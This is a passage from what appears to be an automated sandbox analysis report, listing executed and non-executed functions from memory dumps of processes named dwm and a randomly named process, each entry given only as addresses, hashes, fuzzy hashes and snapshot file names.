                                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                      Function 00007FFAAB47AC70 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB47AD40 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB459FB0 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction ID: 4731d078e3a759ba495a7e0e0eb6d7b1bcf92d2f55c84211b01787c8f054e492
                                                                      • Opcode Fuzzy Hash: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction Fuzzy Hash: 6CE0DF31E899478BF304E304D4543F87201AB223A0F04C3B8C44C972E6EE2DAD4886C1
                                                                      Function 00007FFAAB454597 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab450000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7eb3f3cb95d32db81b1de987173e1a5721f33de1c6ed308fca0652d2e3f7c93
                                                                      • Instruction ID: 1d480be921784c5ddb55c92b3ad3c57e5a43663d72f06e4507c217a8dc7f9bdc
                                                                      • Opcode Fuzzy Hash: a7eb3f3cb95d32db81b1de987173e1a5721f33de1c6ed308fca0652d2e3f7c93
                                                                      • Instruction Fuzzy Hash: B2E08C71E6692ECBF764DFA8D8096BDA7B1FB45640F80023AD009D7299CE242C024B90
                                                                      Function 00007FFAAB4725E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB477700 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 097c72fa5e49c4a95ac1e1f9c995a91fde8d094d0cd5c3ed92f52ea13d8ce6a2
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: F5D01234B619044F870CA739885987477D1EB6A216B9540A9D00AC76B1D96ADC99C781
                                                                      Function 00007FFAAB440B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 7d708afda7aca91cb952d9e2c6bb4e175183190131fa63e7ece1ac36bf97878f
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: 4ED012345A68098FC654E728D9954A4BA90FB0A214F8901D0D40DC7161D35698A4C741
                                                                      Function 00007FFAAB4406A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: f428fbc6977034d030d1d6b48820445d26cb1bb16331a2e643f6f0e8d3f511e8
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: 70C08C01E0F40B83F800332ED4020ECA9005BCB290FD08032C80F402E59C0E20FD01C6
                                                                      Function 00007FFAAB4412B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 34169a35e06d53277d4e23f7ee869349ee897fcf519546a0bfc5e1c814ba86a4
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: CEC04C345519498FDA48EB29C88595477A0FB1A315BD50090E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB443416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b06ec6d7558d212b5c990fc77d47e3d6311f41b90ffb9b5fc8fd07c445ff5a58
                                                                      • Instruction ID: c9ece1b77338cc12d630b06b60aa176a70bf63370f2500206dacfed5b20138a0
                                                                      • Opcode Fuzzy Hash: b06ec6d7558d212b5c990fc77d47e3d6311f41b90ffb9b5fc8fd07c445ff5a58
                                                                      • Instruction Fuzzy Hash: D3C08C02F48DBA83F2146228C02067F04429F80248F8004B0E00EC63C6CC0C9B0102C2
                                                                      Function 00007FFAAB443A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: fc3dbd6b031368a8f4210c7d7a181a04218cece0ed456d64e22340746e301747
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 0AC02B10C4D004C3F3294330C4011FE31401F5A300F05C172C00F52091DE2854281180
                                                                      Function 00007FFAAB4406C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: 1401085b7badf1dab677a00a7fd944e1cebbd174fdf7aa36566134bf2590a3a9
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: ADB01200C5740F43E804337E48420E478505B4B140FC04070D80E40195984E10BC02C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4409B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction ID: 0e1940acc0a3f8b1bc9895f3ce5b0a10781f4cda516efab16a0242bd87582379
                                                                      • Opcode Fuzzy Hash: d51d87f4bf8dc3cd4ccfdd7a9390f68007acb6a097157c88452ed5e5a7d49aa0
                                                                      • Instruction Fuzzy Hash: 9951F58FB4956376E21133BDF0099EC5BE8EFD1376B094AB7D14EC91834D08689982E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB430D4C Relevance: 6.5, Strings: 5, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5\_H$b43$r63$r63
                                                                      • API String ID: 0-904444132
                                                                      • Opcode ID: eff051def05aeb496795f929aaab60cd0d6e6c1ba6fd24e413ce969de9b40e66
                                                                      • Instruction ID: 4e948bfad22383ce87b64c833359e7ab3081276f3de547de1dfb67cdc3ad5bc9
                                                                      • Opcode Fuzzy Hash: eff051def05aeb496795f929aaab60cd0d6e6c1ba6fd24e413ce969de9b40e66
                                                                      • Instruction Fuzzy Hash: 289116B6A18A898FE788DB6CC8657A97FE5FB96310F4441AAD04DD73E2CA7814148780
                                                                      Function 00007FFAAB4308D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b349830e8d72c585c9c88c8ab2991a8cdbc4bd7ec359f36c2d62d03b5e44fcb
                                                                      • Instruction ID: e35496ab4257da2d411b7abd036433755d2770e91425f50b5a76f8a2b84f59b6
                                                                      • Opcode Fuzzy Hash: 9b349830e8d72c585c9c88c8ab2991a8cdbc4bd7ec359f36c2d62d03b5e44fcb
                                                                      • Instruction Fuzzy Hash: B941103264D9149FD714FBACE4899F93BE0EF8632170945BBD08ACB1A3D914AC8187C1
                                                                      Function 00007FFAAB43090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ede9d0cf09ab5b68acf55837f55e472fad7b51f55274d7d02e974364a04212b4
                                                                      • Instruction ID: 440978c5e8ca78e2bb668773b2601876ad1fce80c0499b973cb200a2147fc43f
                                                                      • Opcode Fuzzy Hash: ede9d0cf09ab5b68acf55837f55e472fad7b51f55274d7d02e974364a04212b4
                                                                      • Instruction Fuzzy Hash: B4410752A5E6956FE314B37CE05A9FC7BD1EF85361B0949FAD04ECB1E3CD18684182C4
                                                                      Function 00007FFAAB430908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: 4da51537789a3ced5a8a3eaa0c54621485fea143b99695bb60f3e93e3e0c42b5
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: 7421F83131DC184FE768EB0CE889DB973D1EB5A32170501BAE58EC7176E911EC9287C1
                                                                      Function 00007FFAAB430960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8a358ba5ce35082090765e53035f9258c3de02612f57ed79180d49ae6ca15c89
                                                                      • Instruction ID: 8ff77932328bff690eb0d58cb4154de53d1334e043c1db6f675eba6e0c8bddca
                                                                      • Opcode Fuzzy Hash: 8a358ba5ce35082090765e53035f9258c3de02612f57ed79180d49ae6ca15c89
                                                                      • Instruction Fuzzy Hash: 92310662A5EA566FE258B37CE44AAB877D1EF853A1B0945FAD00EC72E3CC186C4542C4
                                                                      Function 00007FFAAB43116D Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 681f8ef66f5bc1afcb887556c854c185f9667ac3daaac0c940f17778f77c4328
                                                                      • Instruction ID: b16b16d6d0d68f4f71c3214f4ebcee9aede41bdf57f7e8158b79db7dbdcddf96
                                                                      • Opcode Fuzzy Hash: 681f8ef66f5bc1afcb887556c854c185f9667ac3daaac0c940f17778f77c4328
                                                                      • Instruction Fuzzy Hash: DE31E77191E64ACFEF45EB68C8559F97BF0FF1A300B0845BAC00DC71E2DA29A844C781
                                                                      Function 00007FFAAB430998 Relevance: .1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3dd18091b2742b2db811461db989ce18a290122be2e545a3f327af7aff35a80e
                                                                      • Instruction ID: 4fe7eecee2744bcb62754299107323f1d3f3e99e6ac0f0c388d3c381c88e47de
                                                                      • Opcode Fuzzy Hash: 3dd18091b2742b2db811461db989ce18a290122be2e545a3f327af7aff35a80e
                                                                      • Instruction Fuzzy Hash: 89310861A2AA595FE798F738805AA7977D2EF99350B1841FDE40EC33F3CD18A8458390
                                                                      Function 00007FFAAB430C25 Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 59f61bb459ae102b1c996772049f198835c0e15a0374bd840704de50304f336a
                                                                      • Instruction ID: 730b83d7174f70c43f799954f665900caea73a84143c3eb93490123c81649297
                                                                      • Opcode Fuzzy Hash: 59f61bb459ae102b1c996772049f198835c0e15a0374bd840704de50304f336a
                                                                      • Instruction Fuzzy Hash: D331E57691D24A9FF715AB68D8452EC7FB0AF82350F1886B6D04C8A2D2DA3825498791
                                                                      Function 00007FFAAB4369E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 583bb70f3064fcd0795168269b19b5aafb697a19437348371b81369a14d7e464
                                                                      • Instruction ID: 9eda2a139bb636a795185645fb813b41e5bf4ca0e54586a994bbf434744a9949
                                                                      • Opcode Fuzzy Hash: 583bb70f3064fcd0795168269b19b5aafb697a19437348371b81369a14d7e464
                                                                      • Instruction Fuzzy Hash: 7A21FF30D28559CFEB65EB04C4547A9B3E1FB59315F1485EAC40EE3291CB79AE84CB80
                                                                      Function 00007FFAAB436F3D Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f8dfac024968c59d22688251229f0d081a3a2f60f5417602867299986aec4c1e
                                                                      • Instruction ID: 9ef3bc3899ac81881ae8c9375a8ef4ee6fa43bcfdfc69e381ffd862e09dea94f
                                                                      • Opcode Fuzzy Hash: f8dfac024968c59d22688251229f0d081a3a2f60f5417602867299986aec4c1e
                                                                      • Instruction Fuzzy Hash: 60118231D3D50A8BEB54E718D886AB976E1FF56340F1441B9D84ED32E2ED28AC484AC2
                                                                      Function 00007FFAAB430C38 Relevance: .1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7cf2d233d77960181082292055f21e365908ec783f3884a738f2a83b042d0305
                                                                      • Instruction ID: 0fe0f8c0e44b13979d228511f99504b80e2ec94f5d0740bd5fe3cf4c481197aa
                                                                      • Opcode Fuzzy Hash: 7cf2d233d77960181082292055f21e365908ec783f3884a738f2a83b042d0305
                                                                      • Instruction Fuzzy Hash: 0E119E35A0D2899FE706DB78C8502A97FB0EF83250F1D86F7C088DB2E2D53816498790
                                                                      Function 00007FFAAB430C40 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7b085080b56b4609051d88d5f4e6f1b5b474a7d67d8b66b75f3ef0756ba19ea
                                                                      • Instruction ID: 770e5d516fec4fb5f05acfea218d602d6567983c499ead97768d7faa93813c4a
                                                                      • Opcode Fuzzy Hash: a7b085080b56b4609051d88d5f4e6f1b5b474a7d67d8b66b75f3ef0756ba19ea
                                                                      • Instruction Fuzzy Hash: B8118E35A0D289DFE706DB68C4502997FB0EF43350F1986F7C448DB2E2D6381649C781
                                                                      Function 00007FFAAB436F83 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 53bab54295a6459ed35091a809c1dd6116fd58e3517512eecf54ea261a083f4d
                                                                      • Instruction ID: d4387946a7bb3ca71c4bb092aca93b658764cee1dca31603b380193bd2fafc7f
                                                                      • Opcode Fuzzy Hash: 53bab54295a6459ed35091a809c1dd6116fd58e3517512eecf54ea261a083f4d
                                                                      • Instruction Fuzzy Hash: F7014420A2D40ACFEB44EB28D455AB832D1EF46340F1881B5D84EC32E3DD2CAC494685
                                                                      Function 00007FFAAB430C48 Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80c0a3d45f2e77d3cd62e35d34a7d91bcc451934398de8272d62c4a554a49993
                                                                      • Instruction ID: 481c0a84d01cb80fd6441a732e502f3922c4791c88604f79d1b47bef9b55303e
                                                                      • Opcode Fuzzy Hash: 80c0a3d45f2e77d3cd62e35d34a7d91bcc451934398de8272d62c4a554a49993
                                                                      • Instruction Fuzzy Hash: 1B016935A0D289DFE7069B68C850299BFB0AF43310F1986F6C448DB2A2D6386A49C781
                                                                      Function 00007FFAAB436FE1 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction ID: a64add54bdd7fcc9a3969b30062f0d49a1fc2c5e773472ea4923d635a3624a6d
                                                                      • Opcode Fuzzy Hash: d07b5b26c3a0c20170229a639b96947a79ab10b6de91b9e0bc2cb91a825951a1
                                                                      • Instruction Fuzzy Hash: 8A016D3092940ECBEB54EB04D885BF873A0EF46340F1481B9C84ED32E2CD396DC98A84
                                                                      Function 00007FFAAB43701E Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.2058818029.00007FFAAB430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffaab430000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction ID: 8914ae4b25f77c7b1e553c4017f424c906f3f75e1a9fb7ff4852978254d1ea38
                                                                      • Opcode Fuzzy Hash: 1251d3e82537e973c7b5756e56e94c0f5eb721292431cc287cbd807b10bf8afd
                                                                      • Instruction Fuzzy Hash: A7F0D03092D50ACBFA54EB14D485BF933A1EF56380F1482B9D88DD32F3DD296D8D4A85
                                                                      Function 00007FFAAB430B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
